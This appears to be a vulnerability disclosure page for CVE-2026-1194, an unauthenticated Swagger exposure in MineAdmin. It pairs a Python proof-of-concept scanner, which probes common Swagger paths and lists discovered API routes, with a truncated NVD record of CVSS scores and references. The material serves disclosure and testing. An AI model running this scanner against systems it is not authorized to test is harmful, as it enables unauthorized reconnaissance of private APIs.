CVE-2026-1194

# CVE-2026-1194 PoC - MineAdmin Swagger Information Disclosure # Target: MineAdmin 1.x/2.x # Component: Swagger API Documentation import requests import sys import json def check_swagger_exposure(target_url): """Check if Swagger documentation is exposed without authentication""" swagger_endpoints = [ "/api/swagger", "/swagger-ui.html", "/api/doc", "/swagger/index.html", "/api/swagger.json", "/swagger/doc.json" ] print(f"[*] Testing target: {target_url}") print("[*] Checking for exposed Swagger endpoints...\n") exposed_endpoints = [] for endpoint in swagger_endpoints: url = target_url.rstrip('/') + endpoint try: response = requests.get(url, timeout=10, verify=False) if response.status_code == 200: content_type = response.headers.get('Content-Type', '') if 'html' in content_type or 'json' in content_type or len(response.text) > 100: print(f"[+] Found exposed endpoint: {url}") print(f" Status: {response.status_code}") print(f" Content-Length: {len(response.text)} bytes") exposed_endpoints.append(url) # Try to extract API information if endpoint.endswith('.json'): try: api_info = response.json() if 'paths' in api_info: print(f" [!] API paths discovered: {len(api_info['paths'])}") for path in list(api_info['paths'].keys())[:5]: print(f" - {path}") except: pass print() except requests.exceptions.RequestException as e: print(f"[-] Error accessing {url}: {e}") if exposed_endpoints: print(f"[!] VULNERABLE: {len(exposed_endpoints)} Swagger endpoint(s) exposed") print("[!] This allows attackers to gather sensitive API information") return True else: print("[-] No exposed Swagger endpoints found") return False if __name__ == "__main__": if len(sys.argv) > 1: target = sys.argv[1] else: target = "http://target-server.com" check_swagger_exposure(target)

{"cve": {"id": "CVE-2026-1194", "sourceIdentifier": "[email protected]", "published": "2026-01-20T00:15:48.727", "lastModified": "2026-02-05T20:06:58.810", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security flaw has been discovered in MineAdmin 1.x/2.x. This affects an unknown function of the component Swagger. The manipulation results in information disclosure. The attack may be performed from remote. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way."}, {"lang": "es", "value": "Se ha descubierto una falla de seguridad en MineAdmin 1.x/2.x. Esto afecta una función desconocida del componente Swagger. La manipulación resulta en revelación de información. El ataque puede realizarse de forma remota. El exploit ha sido publicado y puede ser utilizado para ataques. Se contactó con el proveedor con antelación sobre esta revelación, pero no respondió de ninguna manera."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "baseScore": 5.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 10.0, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}, {"lang": "en", "value": "CWE-284"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mineadmin:mineadmin:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "2A167C8E-5C7F-4192-8DD0-01444D06C9CA"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mineadmin:mineadmin:2.0:*:*:*:*:*:*:*", "matchCriteriaId": "5EED883D-2F40-4DE0-8816-8495146E06B6"}]}]}], "references": [{"url": "https://github.com/SourByte05/MineAdmin-Vulnerability/issues/5", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Mitigation", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.341779", "source": "[email protected]", "tags": ["Permissions Requir ... (truncated)